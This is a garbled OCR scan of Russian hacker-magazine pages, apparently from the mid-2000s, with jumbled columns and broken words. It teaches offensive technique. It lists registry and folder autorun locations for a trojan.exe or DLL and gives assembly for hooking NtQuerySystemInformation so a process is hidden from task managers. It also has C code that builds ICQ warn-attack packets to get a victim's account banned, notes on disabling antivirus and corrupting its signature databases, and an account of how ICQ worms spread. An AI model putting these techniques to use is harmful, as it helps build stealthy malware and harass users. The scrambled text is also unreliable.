и аверы себя защищают - не дают с русским народным антивирусом. тоянии уже многие годы), хотя и не ekyaa Ухо 
процесс убить. В этом случае нам по- Продукт лаборатории Касперского па- — все известные ловятся и лечатся. Да дят фай- 
может старая, как Винда, “уязви- дает или отключается: чего говорить о неизвестных? Суще- на 
мость". Я говорю об управлении прог- ствуют аверы, которые до сих пор не этот жур- 
раммами через мессаги. Не будем рас- var h:integer; сканируют файловые потоки МТЕ5'а! А 
сматривать серии сообщений и “дол- begin Вот, например, эта самая функция ссылкой 
roe” управление программами. На просмотра срайловых потоков: р: 
zine/xa/O65 
function BackupSeekA(hFile: THandle; /14/5.asp. 
dwLowBytesToSeek, dwHighBytesToSeek: 
DWORD; |pdwLowByteSeeked, 
№ vx.org.ua - архив, большой-пре- IpdwHighByteSeeked: PDWORD;var 
большой :). Тут можно ознакомить- IpContext: Pointer): BOOL; stdcall; external 
ся как с теорией (собрано огром- kernel32 name 'BackupSeek', Е 
ное количество журналов), так и . вующих ан- 
Так что есть у русских тайные погре- тивирусов - 
получить сорсы известных (и не ба, как говорил Мальчиш-Кибальчиш, ыы и = 
очень) вирусов. Недаром они зовут и вам их не засыпать :). Кстати, не сто- ео На" 
себя VX Heavens. ит забывать и о возможности порчи стирание 
вирусами сигнатур базах известных И 
антивирусов. В интернете без проб- ние не об- 
~ ратит, прос- 
лем можно найти описание срорматов то потребу- 
практически всех популярных баз и ет обновле- 
рабочие примеры извлечения и изме- ния :). 
Ш zOmbie.host.sk - zZOmbie написал нения в них инфы. Советую также об- 
очень много теоретических и прак- ратить внимание на свои архивы. Су- 
тических статей на тему вирмэйкер- и one 
i них, иногда замещая собой исполняе- 
ства. Также у него можно найти мые срайлы. Найти известный архива- При se 
потрошитель баз КА\ ;). тор на компьютере пользователя и oor ala 
добавить себя в архив довольно лег- Delphi очень 
ко. Например, для формирования па- НЫ 
раметров к RAR'y обрати внимание на иметь дело 
“O+" - перезапись существующих НЕЕ 
файлов. Вот одна из вариаций клю- MS-6aramu, 
чей: ноис 
ошибками 
Ш 29a.host.sk - очень хороший e-zine. В каждом новом номере дяди Борма- 
всегда есть что почитать и чему научиться. ‚ WinExec(PathToRarExe+ ‘a -o+ ее 
Ш WWW.WaSM.rU - здесь ты найдешь интересные стати по сокрытию Ата УСОВ а 
деятельности программ и много другой полезной информации. ЗЕВС с С++ Hen- 


равильно. 
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КАК СКРЫТЬ ТРОЯН OT УМНЫХ ЮЗЕРОВ 


og "прятками" понимается незаметная загрузка и незаметная работа программ 


(в том числе троянов) в Windows. О том, как трояны причутся в системе, читай в этой статье. 


ехники автозагрузки 


мы условно разделим 


на активные и пассив- 


ные. Трояны, использу- 
ющие активные техни- 
ки, стартуют вместе с системой. Чтобы 
троян загрузился, от пользователя не 
требуется никаких специальных 
действий - достаточно просто вклю- 
чить машину. Трояны, использующие 
пассивные техники, запускаются при 
выполнении пользователем каких-пи- 
бо действий - обычно нужно что-то 
открыть, нажать и т.п. 


АКТИВНО 

ш Традиционно основное внимание 
уделяется модификации реестра. В 
реестре Windows существует множе- 
ство ключей, которые троян может ис- 


пользовать для автозагрузки. Эти 
ключи часто упоминаются в различ- 
ных руководствах по безопасности, 
причем смысл упоминаний всегда 
один и тот же: если прописать там ЕХЕ 
(в некоторых случаях DLL), то он заг- 
рузится при старте системы (DLL, ес- 
тественно, будет подгружаться в про- 
цессы при их старте). 

Особо тут не разгонишься, так как 
модисрикация веток реестра в 
HKEY_LOCAL_MACHINE (чтобы рабо- 
тало для всех пользователей) требует 
прав администратора. А на нормально 
настроенной системе трояну этих 
прав никто не даст :) (даешь права 
Local System! - прим. AvaLANche'a). И 
простая запись в реестр - глупый шаг. 
Такого трояна с помощью regedit пой- 
мает любой. Поэтому в действительно 


хороших, профессионально написан- 
ных троянах используются более 
сложные техники автозагрузки и 
стелса. Обычным просмотром ключей 
автозагрузки обнаружить такие троя- 
ны, как правило, не удается. 

Одной из профессиональных техник 
считается создание недоступного 
ключа в реестре. Эта дфишка описана 
у Марка Руссиновича на www.sysinter 
nals.com, там же есть исходники на MS 
Visual C++ 
(www.sysinternals.com/files/reghide.zip). Nepe- 
дирать исходники один в один - пос- 
леднее geno, а вот понять сам прин- 
цип важно. 

Принцип достаточно простой. Боль- 
шинство редакторов реестра для ра- 
боты с реестром используют обычные 
Win32 API, в которых строки рассмат- 


Откуда может грузиться trojan.exe 


Ветка/ключ Нужны права! Работает для 
(вместо апу_пате можно вписать любое имя) админа? | пользователей Комментарии 
и ме текущего Нет. 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ 
any_name="trojan.exe" ga всех Нет. 
о rentVersion\RunOnce\ В обоих ветках ключи "одноразовые": trojan.exe 
д ААА: : : да всех стартует при загрузке Windows, сразу после 
о этого система стирает запись из реестра. 
trojan.exe стартует еще до окончательной загруз- 
HKLM\SYSTEM\CurrentControlSet\Control\Session a ах ки грасрической оболочки Windows (что сильно 
Manager\BootExecute="trojan.exe" 9 ограничивает его возможности), поэтому здесь 
обычно прописывается только загрузчик трояна. 
HKLM \SOFTWARE\Microsoft\Windows МТ\ CurrentVersion \ A ass Her 
Winlogon \shell="explorer.exe trojan.exe" 9 i 
я р A Роль папки "Автозагрузка" теперь выполняет 
HKCU \Software\Microsoft\Windows\CurrentVersion\Explorer\User Napa 
SNe м нет текущего c:\trojan_folder. При старте из нее загрузятся все 
Shell Folders\ startup="c:\trojan_folder ЕХЕ-файпы. 
HKCU \Control Panel\Desktop\ScreenSaveActive="1"_kpome того 
должно быть Скринсейвер включен, исполняемый модуль 
HKCU \Control Е renvitere скринсвейвера - trojan.exe (можно 
и У переименовать в trojan.scr, но не обязательно), 
иеще HKCU \Control время активации - 60 сек. 
Panel\Desktop\ScreenSaveActive\ScreenSaveTimeOut="60" 
Откуда может грузиться trojan.dil 
Ветка/ключ Нужны права! Работает для 
(вместо апу_пате можно вписать любое имя) админа? пользователей Комментарии 
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows\ A Baa 
Applnit_DLLs="<path>\trojan.dll" 9 Вместо <path> надо прописать полный путь к 
HKLM \SOF TWARE\Microsoft\ Windows . ga м HE CHEE 
Ni \CurrentVersion\Wiplogon \Nouty\anyname\ в этой ветке малейшей ошибки в загружаемом модуле мы 
ее ат ЩО будем иметь вечное зависание при загрузке. 
ИИ и А у Иногда изменение этих ключей приводит к краху 
ne rae seer системы даже если в модуле все в порядке. 
о. Короче, гарантий никаких :-( 
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любой 


риваются как последовательность 
байтов с завершающим нулем. Native 
АР! используют строки в формате 
Unicode, поэтому с помощью них мож- 
но создавать ветки и ключи в реест- 
ре, которые будут недоступны в обыч- 
ных редакторах реестра. Недоступны 
означает, что они либо невидимы, ли- 
бо их видно, но открыть нельзя. 

Хотя модификацию реестра исполь- 
зуют чаще всего, для трояна это не 
единственная возможность загру- 
зиться. Существуют и другие актив- 
ные техники, например, создание в 
папке автозагрузки ЕХЕ-срайла с ат- 
рибутом "hidden". В меню "Пуск\Прог- 
раммы\Автозагрузка" его не видно 
(пока пользователь не включит отоб- 
ражение скрытых файлов в свойствах 
Windows Explorer'a - прим. peg.), но он 
все равно загружается. Или модифи- 
кация существующих ярлыков в той 
же "Автозагрзке" с прописыванием в 
них пути к трояну. Но все техники та- 


Класс папки "Мои документы" 


Так что оптимальным решением оля трояна 
является использование и тех, и других 
техник в зависимости от обстоятельств. 


ример, "Блокнот" чаще всего являет- 
ся обработчиком для ЕХ-файлов и 
автоматически запускается при по- 
пытке открыть текстовый документ. 
Троян может прописаться как обра- 
ботчик ЕХЕ-файлов и стартовать при 
запуске приложений. 


Модификация класса папки 
Относительно новая техника. Ис- 
пользует то, что некоторым специаль- 
ным папкам ("Корзина", "Мои доку- 
менты" и т.п.) поставлены в соответ- 
ствие классы в реестре. Открой, к при- 


ся InProcServer32. Посмотри на ge- 
фолтовый ключик в этой ветке. В нем, 
если не влезать во все эти "комы" и 
"о-це-иксы", прописан модуль, работа- 
ющий с папкой "Мои документы": По 
умолчанию "=туаосз.а!". Что мешает 
трояну поработать с mydocs.dll :)? 
Также трояну стоит обратить внима- 
ние на файлики с расширением .htt. 
Они называются шаблонами папки и 
содержат скрипты, выполняемые при 
ее открытии. Естественно, скрипты эти 
можно дополнить/подправить ;). 


кого плана довольно слабые и серь- меру, "Мои документы". Там лежит АКТИВНО ИЛИ ПАССИВНО? pee 
езную угрозу представляют только в скрытый файл desktop.ini. А в нем сле- и Для того чтобы в полную силу ис- перехвата 
связке с тем же перехватом API. дующее: пользовать активные техники, нужны ть 
права администратора. У трояна их формы 
ПАССИВНО [ShellClassinfo] обычно нет. Хотя, с другой стороны, Win32" (на 
www.wasm.ru) 
m Пассивные техники также часто CLSID2={450d8fba-ad25-11d0-98a8- активные техники позволяют трояну отражены 
используются в троянах, хотя они по- 08003615103} загрузиться вместе с системой и не проблемы, с 
чему-то менее популярны. Пассивных | ждать, когда пользователь сделает ром crane 
техник очень много, но мы рассмот- Теперь открой редактор реестра и что-то, что запустит троян. кивается 
рим только некоторые из них. через поиск найди ветку "45048 а- Пассивные техники требуют от поль- а 
ad25-11d0-98a8-0800361b1103" (эта бе- зователя выполнения каких-то опре- тить сис- 
Ассоциация с ЕХЕ либерда генерируется системой слу- деленных действий - только тогда тро- ое 
В своем роде классика. В Windows чайно, так что на разных машинах она — ян стартует. До этого он лежит на дис- vad К 
расширению можно поставить в соот- разная). В ней увидишь несколько ке мертвым грузом. Но для пассивных 
ветствие программу-обработчик. Нап- подветок, одна из которых называет- техник не нужны права администрато- 
НИШ ра, более того, пассивные техники в 
ряде случаев позволяют эти права рн 
Хотя модификацию реестра используют = получить. Например, подменить win- кие Native 
word.exe можно и под пользователем. АР! стоит 
Hea le ВОГО; для трояна это не А потом тихо лежать на винте и ОЕ рае. 
единственная возможность загрузиться. = ждать когда придет кто-то с админс° = сказанов 
кими правами и попробует открыть ви 
документ MS Word в своем сеансе ;). димым в 
Так что оптимальным решением для ИН 
трояна является использование и тех, ский пере- : 
и других техник в зависимости от обс- Bog которой 
есть на 


; Начало Native API 


тоятельств. 


УМНЫЙ СПЛАЙСИНГ 
NATIVE API 

и Теперь поговорим о стелсе. Чтобы 
скрыть свое присутствие в системе, 
большинство троянов используют пе- 
рехват API. Можно было бы порассуж- 
дать о традиционных способах перех- 
Bata API, но на эту тему уже написано 
много хороших статей. 


Www.wasm.ru. 


wn 
= 
о 
[= 
=. 
= 
< 
= 
< 
x 
< 
- 
< 


B8XXXXXXXX mov eax, XXXXXXXX 
80542404 lea edx, dword ptr [esp+04] 


; В вах - номер системного сервиса 

; В edx - указатель на стек с параметрами 
; вызываем системный сервис 

; очищаем стек 


Конечно, придумать новый способ 
перехвата API y рядового троянопи- 
сателя вряд ли получится. Но немно- 
го усовершенствовать какую-нибудь 
традиционную технику вполне воз- 
можно. Правда, выбор ограниченный. 
Традиционных техник, по большому у 


CD2E int 2E 


(21000 ~=sret YYYY 
; Конец Native API 


wn 
= 
о 
a 
z 
= 
< 
= 
< 
4 
< 
- 
< 


Перехват- 
чик с ис- 
ходниками 
на MASM 
есть на 
диске к 
журналу. 


Подробнее с 
полями 
SYSTEM_PR 
OCESS_INF 
ORMATION 
можно оз- 
накомиться 
в статьях 
по недоку- 
ментиро- 
ванным 
функциям 
МТ (Гугл в 
помощь!). 


Много по- 
лезной ин- 
формации 
ты найдешь 
на 
www.wasm.r 
un 
www.sysin- 
ternals.com. 


ИГРА В ПРЯТКИ 


Процесс вызывает сплайснутую АР! 


счету, всего две: сплайсинг и моди- 
фикация импорта. Модификация им- 
порта - это довольно надежно, но при 
реализации приходится учитывать 
многие нюансы. Поэтому код обычно 
получается слишком большим и 
сложным :(. Сплайсинг - более прос- 
тая техника. В то же время, она счита- 
ется менее надежной. 

Обычно сплайсинг реализуется так: 

Ф. В адресное пространство чужого 
процесса тем или иным способом 
внедряется код, и ему передается уп- 
равление. 

©. Получив управление, внедрен- 
ный код находит адрес перехватывае- 
мой АР|-функции и меняет первые 
пять байт на инструкцию jmp ХХХ, где 
вместо ХХХ стоит адрес нового обра- 
ботчика, который находится в том же 
внедренном коде. Оригинальное нача- 
ло функции (переписываемые пять 
байт) при этом сохраняются для ис- 
пользования в дальнейшем. На ag- 
ресные пространства других процес- 
сов все эти манипуляции не влияют. 

Теперь, если процесс вызовет изме- 
ненную API, сперва выполнится jmp 
ХХХ и управление получит внедрен- 
ный обработчик. 

Правда, тут возникает одна пробле- 
ма. В большинстве случаев обработ- 


чику, перед тем как вернуть управле- 
ние процессу, нужно самому вызвать 
эту же АР! - например, чтобы проана- 
лизировать и подправить результат 
ее выполнения. Поэтому каждый раз 
перед тем, как вызывать перехваты- 
ваемую API, обработчик вынужден 
восстанавливать в ней первые пять 
байт. Естественно, сразу после вызо- 
ва обработчик опять вписывает в на- 
чало АР! jmp ХХХ. И так все время :). 

Все бы хорошо, но Windows - систе- 
ма многозадачная. Потоки по очереди 
то запускаются, то приостанавливают- 
ся. Где гарантия, что система не оста- 
новит поток обработчика как раз в тот 
момент, когда он восстановил начало 
API? И не запустит другой поток, кото- 
рый вызовет эту же API? Тогда вызов 
пройдет мимо обработчика и наш про- 
цесс (или ключ реестра, или что-либо 
еще, скрываемое с помощью сплай- 
синга) из невидимого превратится в 
видимый :(. А это не есть гуд. 

Из-за этого неприятного момента 
сплайсинг используют с некоторой 
опаской. Но попробуем изменить по- 
ложение дел. Известно, что многие 
"нормальные" документированные 
АР! являются надстройками над 
Native АР! библиотеки ntdll.dll. Поэто- 
му для наших целей достаточно нау- 
читься перехватывать некоторые из 
Native API. Дизассемблировав ntdll.dil 
и изучив код нескольких Native API, 
мы видим, что все они имеют одинако- 
вую структуру (см. листинг). 

Вместо ХХХХХХХХ стоит двойное 
слово - номер системного сервиса. 
Естественно, у каждой Native API oH 
свой. Кроме того, номера одной и той 
же функции могут отличаться в раз- 
ных билодах и сервиспаках Windows 
(не говоря уже о разных версиях). 
Как и обычным API, параметры Native 
АР! передаются в стеке. Исходя из 
этого, легко догадаться, что YYYY - их 
общий размер. 


Модификация импорта - это довольно 
надежно, но при реализации приходится 
учитывать многие нюансы. 


Троянский обработчик восстановил на- 
чало АР! и вызывает сам 
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Умный сплайсинг 


Сплайсинг прошел успешно - процесс 
скрыт 


Итак, в плане кода все Native API Ha 
одно лицо. Тогда организуем сплай- 
синг несколько нетрадиционно: 

Ф. В адресное пространство чужого 
процесса внедряется код (например, с 
помощью установки глобального хука). 

©. Получив управление, код находит 
адрес перехватываемой Native API и 
проверяет первый байт по этому ад- 
ресу. Там должен быть OxB8 - onkog 
инструкции Mov. 

@. Внедренный код читает номер 
системного сервиса и в своем теле 
формирует переходник вида: 


; Код переходника 

mov eax, XXXXXXXX 
push пех мяг 
ret 


next_instr - адрес второй инструкции 
перехватываемой срункции (это lea 
edx, [esp+04)). 

@. В первые пять байт перехватыва- 
емой функции вписывается jmp на об- 
работчик. 

Теперь, если процесс вызовет пе- 
рехваченную Native API, управление 
сразу попадет на обработчик. Когда 
обработчику понадобится вызвать ту 
же Native API, он не будет восстанав- 
ливать первые пять байт, а просто 
сделает са! на переходник. Назовем 
такую технику умным сплайсингом. 


НА ПРАКТИКЕ 

m Давай что-нибудь напишем. Нап- 
ример, попробуем скрыться от менед- 
жера процессов, перехватывая 
NtQuerySystemInformation. Наш пе- 
рехватчик будет состоять из двух мо- 
дулей: инсталлятора т$а!ег.ехе и 
библиотеки injectDLL.dll, в которой со- 
держится внедряемый код. 

Инсталлятор - простенькая програм- 
мка, которая загружает DLL и вызывает 
из нее дрункцию InstallHook. Если все 
прошло успешно - функция InstallHook 
возвратила ненулевое значение, инс- 
таллятор выводит message box с сооб- 
щением об успешном перехвате. 

Библиотека устроена посложнее. 
Функция InstallHook с помощью АР! 
SetWindowsHookEx устанавливает 
глобальный хук на вызов процеду- 
ры окна (WH_CALLWNDPROC). Про- 
цедура хука HookProc не делает ни- 
чего полезного, просто передает 
вызов дальше по цепочке. 

В точке входа DLL впишем такой код: 


_Start: ;точка входа 
; причина вызова - загрузка 
; в новый процесс 


mov eax, [esp+8] 
amp eax, DLL PROCESS ATTACH 
je h8 ; да 
В 8: ; первая ли это загрузка DLL 
‚ (если ga, то hinst=0) 
стр hinst, 0 
jne SpliceAPI ; нет - 


‚ сплайсировать API! 
; если управление попало сюда, 
; DLL загружена впервые 
‚ запомним hinst 


mov eax, [esp+4] 

mov hinst, eax 
ht: ; ВЫХО9 

mov eax, 1 

ret 12 


DLL при первой загрузке получает со- 
общение DLL_PROCESS_ATTACH, запи- 
сывает свой HINST в зВагед-секцию 
data. Каждый раз, получая 
DLL_PROCESS_ATTACH, DLL проверяет, 
записан ли уже HINST в .data. Если да, 
значит, DLL загружается не впервые - 
хук уже поставлен и DLL попала в чу- 
жое адресное пространство. Очутив- 
шись в чужом адресном пространстве, 
код инициализации DLL вызывает 
функцию сплайсинга SpliceAPI. Функ- 
ция узнает HINST ntdll.dll, адрес 
NtQuerySystemInformation. Затем cpyHk- 
ция проверяет первый байт 
NtQuerySysteminformation. Если байт 
правильный, подготавливается пере- 
ходник. Он находится в секции данных: 

NtQSI_thunk db Ob8h, 0, 0, 0, 0, \ 

‚ ^- это MOV еах, XXXX 
068h, 0, 0, 0, 0, \ 
‚ ^- это push хххх 

Oc3h 

; ^- это ret 


Подготовку осуществляет следую- 
щий код: 


mov ebx, dword ptr [еах+1] 
; строка ниже - это Mov eax, Service_nmbr 
mov dword ptr [NtQSI_thunk+1], ebx 


- HY ГДЕ МОЙ КРЯКЕР ИНТЕРНЕТА? 


mov ebx, eax ; вычисляем адрес 

; второй инструкции NtQSI 
add ebx, 5 
‚ строка ниже - это push addr NtQSI 
mov dword ptr [NtQSI_thunk+6], ebx 


Затем осуществляется замена пер- 
вых пяти байт 
NtQuerySysteminformation. Делается 
это стандартным способом. Для сня- 
тия защиты с первых пяти байт перех- 
ватываемой срункции используется 
VirtualProtect. Вместо них записывает- 
ся jmp на обработчик - функцию 
api_hook_proc: 


‚ вычислим смещение gna jmp 
mov ebx, offset api_hook_proc 
sub ebx, eax 

sub ebx, 5 

‚ пропатчим АР! 

mov byte ptr [eax], 0e9h 

mov dword ptr [eax+1], ebx 


Защита восстанавливается все той 
же VirtualProtect. Теперь при вызо- 
ве процессом 
NtQuerySystemInformation управле- 
ние получает наш обработчик. Обра- 
ботчик сперва вызывает оригиналь- 
ную процедуру (в любом случае это 
нужно). При этом он не восстанавли- 
вает ее начало, а просто делает call 
на переходник. Потом обработчик 
проверяет аргумент SysinfoClass. Ес- 
ли он не равен 5, то 
NtQuerySystemInformation была 
вызвана не для того, чтобы полу- 
чить список процессов. В этом слу- 
чае управление просто отдается вы- 


зывающему процессу. Если же 
SysinfoClass имеет значение 5, обра- 
ботчик проходится по цепочке 
структур SYSTEM_PROCESS_INFOR- 
MATION, которые после возврата из 
NtQuerySystemInformation лежат по 
адресу SysInformation. 

В каждом элементе цепочки обра- 
ботчик проверяет имя процесса. Ес- 
ли оно совпадает с installer.exe, 
предыдущий элемент корректирует- 
ся. Цель коррективы - увеличить 
поле смещения (первое в записи) 
на следующий элемент цепочки, 
чтобы оно указывало на структуру, 
идущую за той, которая содержит 
информацию о нашем процессе. Та- 
ким образом, структура, содержа- 
щая информацию о нашем процес- 
се, аккуратно исключается обработ- 
чиком из цепочки. 

Библиотека также обрабатывает 
DLL_PROCESS_DETACH и при отг- 
рузке из адресного пространства 
процесса снимает хук. Большое 
преимущество техники умного 
сплайсинга в том, что она в отличие 
от традиционного сплайсинга на- 
дежна. И внедрение DLL через гло- 
бальный хук не требует прав адми- 
нистратора, так что перехватить па- 
рочку-другую API троян спокойно 
может и под гостем. 

Напоследок скажу, что умный сплай- 
синг можно усовершенствовать, если 
прикрутить к перехватчику АР! не- 
большой дизассемблер. 2 


Умный сплайсинг можно 
усовершенствовать, если прикрутить к 
перехватчику АР! небольшой 
дизассемблер. 
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НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ 
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Роман Куберов aka 9 


ИЗВРАЩЕНИЯ С ТЕТЕЙ АСЕЙ > 


Бег (tehnomagix@mail.ru) 


нов. 


В интернете 
есть боль- 
шое коли- 
чество пол- 
ных описа- 
ний прото- 
кола ICQ. 
Вот одно из 
них: 
www.icqifo.r 
u/protocol_v 
8.shtml. 


вел поднять зпт целую зпт ваш кли- 
ент XXX THK). Как мы уже говорили 
чуть выше, ICQ и АМ работают по og- 
ному протоколу. Но значит ли это, что 
подобный COUT ушами можно провер- 
нуть и с аськой? Оказывается, да. В 
принципе, данную атаку (называемую 
варн-атакой) можно считать разно- 
видностью флуда (в отличие от нее 
при conyge на UIN жертвы просто при- 
ходят миллионы сообщений, здесь же 
количество участников намного мень- 
ше). Атака эта, по сути, довольно 
грозная вещь, потому что постоянный 
бан UIN'a поссорившегося с хакером 


м! 
а). 


5 Cag) ® 8-м 


я. 


мы 


даться, передача и прием FLAP-nake- 
тов между серверной и клиентской 
частями. Ты скажешь, что работа про- 
токола заключается в передаче и при- 
eme 5МАС-пакетов. Но это не совсем 
верное утверждение, Tak как FLAP-na- 
кет инкапсулирует первым. 

Минимальную теорию мы, можно 
считать, освоили, поэтому настало 
время перейти к предмету нашей се- 
годняшней дискуссии. Начнем мы со 
структуры пакета, отвечающего за 
варн-атаку. Вот ее схема: 

SNAC(04,08) CLI_ICBM_SENDxXWARNING 

SNAC FORMAT 
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ы a 
> WARN-ATAKA, 1СО-ЧЕРВИ И НЕСАНКЦИОНИРОВАННЫЕ ДЕЙСТВИЯ 
< 
Е CQ, или аська, IM (instant теззепдег/интернет-пейджер), от компании Mirabilis - на сегодня, должно быть, самая 
< популярная программа для мгновенного обмена сообщениями. Пользователей этой программы миллионы по всему 
миру. Поэтому неудивительно, что многие «народные умельцы» используют возможности тети Аси в своих грязных 
целях. 
АТАКА HA ICQ юзера не предвещает ничего хороше- 00 04 word SNAC fami- 
ЧЕРЕЗ AIM го: несмотря на то что (ИМ его никто у (т.н. мажор) 
m AIM (AOL Instant не угоняет, воспользоваться он им TO- 00 08 word SNAC sub- 
Messenger) u ICQ pa- же не сможет. уре (минор) 
ботают по одному 2 
протоколу OSCAR (более Toro, че- НЕМНОГО ТЕОРИИ ХХ ХХ ХХ ХХ dword — ЗМАС 
рез одни и те же серверы - прим. и Пакет в ICQ/AIM называется FLAP. equest-id, может быть случайным числом 
AvaLANche'a). Это, в частности, дает FLAP содержит в себе 5МАС-пакет, ко- XX XX word "send as" 
возможность «сидеть» в АМ, исполь- торый, в свою очередь, содержит lag: l-anonymous, 0-non-anonymous 
зуя свой УМ в ICQ. В сети АМ есть та- ТЕ\-пакет (образуя своеобразную XX byte screen- 
кое понятие, как warning-level, «матрешку»). name string length (длина уина) 
которое означает, что любой пользо- SNAC несет в себе 2 значения: ма- ХХ .. string screen- 
ватель AIM может вынести Npegyn- жор и минор. Мажор определяет се- name string (сам yuk) 
реждение другому, если TOT некор- мейство пакетов, а минор - конкрет- 
ректно общается, рассказывает боро- ный пакет из этого семейства. По ма- Теперь в TenerpacpHoM стиле рас- 
датые анекдоты про Чапаева и отваж- жору и минору сервер и клиент произ- смотрим несколько вспомогательных 
ного чукчу-оленевода и занимается водят разбор тех или иных пакетов и функций, которые нам понадобятся 
прочими асоциальными вещами :). Ес- применяют к ним определенные для формирования О$САК-пакета (в 
ли такой товарищ ухитрится достать инструкции. данном примере мы рассмотрим толь- 
своим искрометным юмором троих TLV - это произвольные данные пе- ко процесс создания варн-пакета, по 
пользователей, то ero SN (screen ременной длины: YUH, пароль, текст и аналогии достаточно просто сформи- 
name, аналог UIN'a в аське) забанят т.д. Обычно они являются частью ровать и другие О$САБ-пакеты). Спи- 
на срок от 3 go 5 часов. Происходит SNAC'oB, но в некоторых случаях MO- сок функций будет иметь вид «объяс- 
это приблизительно так: от трех поль- гут существовать и без них, например, — нение: функция». 
- зователей серверу отсылается пакет пакет «login». 
Е следующего содержания: (клиент ХХХ Основной принцип работы 1СО/А!М- @. Функция для помещения в бу- 
для 1СО'ма- серверу тчк клиенту YYY варнинг-ле- протоколов - это, как нетрудно дога- qpep данных в один байт или 8 бит: 


#define writeb(buf, value)(*(buf) = (value), 
(buf++)) 


@. Функция для помещения в бу- 
фер данных в два байта или 16 бит. 

Не забываем, что существует сете- 
вой порядок следования байт, поэто- 
му здесь мы применяем функцию 
htons для двухбайтовых значений: 


static char *writew(char *buf, u_intl6_t 
value) 
{ 
*((u_intl6_t *) buf)++ = 
htons(value): 
return buf; 
} 


©. Функция для помещения в бу- 
дер данных в 4 байта или 32 бит. 

Здесь происходит аналогичный про- 
цесс, что и для функции выше, но мы 
применяем сункцию Моп! для 4-байт- 
ных значений: 


р 
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static char *writel(char *buf, u_int32_t 
value) 
{ 


epee 


*((u_int32_t *)buff)++ = 
htonl(value); 
return buf; 
} 


@. Функция для помещения в бу- 
сфер значений произвольной длины, 
например, текст сообщений, UIN, 
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пароль и T.g.: 
static char *writes(char “buf, const char = : 
*data, int len) Е 
{ Е 
memcpy(buf, data, len); Е = = 
return buf+len; == il 
} x 


ра = 


Е: 
is TTT 7 


FLAP-nakeT имеет заголовок с фик- 


сированной длиной, равной 6 байтам, 
и следующий за ним блок данных (пе- 
ременной длины). \х2А' (Command 
Start) позволяет сервису отличать па- 
кет ICQ от других пакетов (начало па- 
кета ICQ). 

Смотрим на схему. 

Channel ID - идентификатор канала. 


Sequence number - может быть слу- 
чайным числом. 

Data - собственно данные, которые 
мы передаем в пакете. 

Ниже приведена пара функций, ко- 
торые мы будем использовать для 
открытия и закрытия ЕЕАР'а. 


static char *flap_begin(char “buf, char 


word 


Заметь, мы уже используем сфунк- 
ции, которые предопределили выше, 
и теперь настало время нашей глав- 
ной функции, в которой и формирует- 
ся варн-пакет. 

Приступим к основному коду. 


Data 


variable 


chanel) 
= { 
static int seq = 0; 
Command Start buf = writeb(buf, 0x2A); 
byte: ~\x2A’ buf = writeb(buf, chanel); 
buf = writew(buf, ++$е0); 
1 return buf+2; 
i } 
Channel ID static char *flap_end(char *buf, char 
byte *start) 
| { 
= start -=2; 
writew(start, buf-start-2); 
Sequence Number ; return buf, 


КАНАЛЫ ТЕТИ АСИ 


Ш Ha сервисе ICQ есть понятие канала (channel). Всего их 5 штук, 
и, в зависимости от того какой канал в указан пакете ICQ, он пере- 
дается на обработку соответствующим службам (функциям). Канал 
в пакете ICQ всегда указывается вторым байтом во ЕЁЕАР-пакете. 

chanel 1 - служит для начальных целей, таких, как установление 


связи (авторизация). 

chanel 2 - служит для передачи основных пакетов, передачи дан- 
ных, в том числе и сообщений. 

chanel 3 - канал обработок ошибок. 

chanel 4 - канал разъединения. 

chanel 5 - служебный канал; возможно, он используется админист- 
раторами. 


main(int argc, char *argv{]) 
у 


Объявляем, соответственно, буфер, 
куда мы будем все сформировать, 
FLAP и TLV: 


static char “buf, *Нар, *tlv; 


Идентификатор запроса - необходи- 
мое значение для 5МАС-заголовка, 
при сеансе каждый раз увеличивает- 
ся на единицу. Если это значение не 
будет увеличиваться, произойдет 
мгновенное отключение от сервера: 


u_int32_t requestid = 0; 


Собираем варн-пакет и пакуем это 
все хозяйство в буфер: 


buf = (char *)malloc(n, sizeof(char )); 
buf = flap = flap_begin(buf, 2); 

buf = writew(buf, 0x0004); 

buf = writew(buf, 0x0008); 

buf = writew(buf, 0х0000); 

buf = writel(buf, ++requestid); 


Важное замечание по поводу ано- 
нимности посланного пакета: значе- 
ние ОхОО01 сформирует анонимный 
пакет, значение ОхОО00 сформирует 
неанонимный пакет. 

В общем, если посылать пакет ано- 
нимно, сервер просто откажется его 
принять :). Пишем: 


buf = writew(buf, 0x0000); //не аноним- 
НЫЙ 

buf = writeb(buf, uinlen); 

buf = writes(buf, uin, uinlen); 

flap_end(buf, Нар); 


После того как мы сформировали 
буфер (а мы его сформировали), отп- 
равляем его на сервер функцией 
send, а в случае сетевой проблемы 
выводим ошибку: 


if(send(sock, buf, packlen,0) == -1){per- 
ror("SNACO4,08 Send:"); exit(1);} 


На компакт- 
диске ты 
найдешь ис- 
ходный код 
программы, 
которая по- 
казывает 
варнинг-ле- 
вел клиента 
1СО. Само 
собой, его 
легко моди- 
фицировать 
для нужд 
молодежи :). 


Если тебе 
надоела 
аська, goc- 
таточно 
указать в 
настройках 
свой e-mail: 
ххх@уке.ги 
(вместо ххх 
можно 
подставить 
что угодно), 
и уин ока- 
жется ан- 
регнут :). 


icq2000cc.ho 
bi.ru - 
IcQ2000: 
сделай сам :). 
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ИЗВРАЩЕНИЯ С ТЕТЕЙ АСЕЙ ) 


Если пакет был успешно доставлен 
на сервер, сервер вернет нам пакет со 
SNAC(04, 09), в котором будет содер- 
жаться новый уровень warning-level’a 
№ а, который мы собрались атако- 
вать, в процентах. В случае отказа 
сервера в данной услуге вернется па- 
кет со SNAC (04, 01). 

На этом мы завершаем наш краткий 
рассказ про warn-ataky. Дело это по- 
ка еще непубличное, и полные исход- 
ники тебе никто просто не отдаст, но 
кое-что мы все же раздобыли и выло- 
жили на CD к журналу. Хватай, пока 
горячее :). Но тема атак на известный 
пейджер этим не ограничивается. На 
закуску мы расскажем о слегка уста- 
ревших, но еще рабочих способах. 


1С0-ЧЕРВИ 

m Как таковые, [СО-черви являют- 
ся программами двухступенчатого 
принципа действия. Механизм рабо- 
ты червя достаточно прост, более 
того, он вопреки слухам даже не ис- 
пользует протокол ICQ для распро- 
странения. Алгоритм его такой: 
червь рассылает с зараженного 
компьютера сообщение по сети ICQ 
(используя контакт-лист зараженной 
машины): «Посетите сайт 
..com|biz|net». Если пользователь 
заходит на этот сайт, в дело вступает 
скрипт, использующий уязвимости в 
Internet Explorer, который собствен- 
но и отвечает за размножение чер- 
вя. Именно он скачивает на компью- 
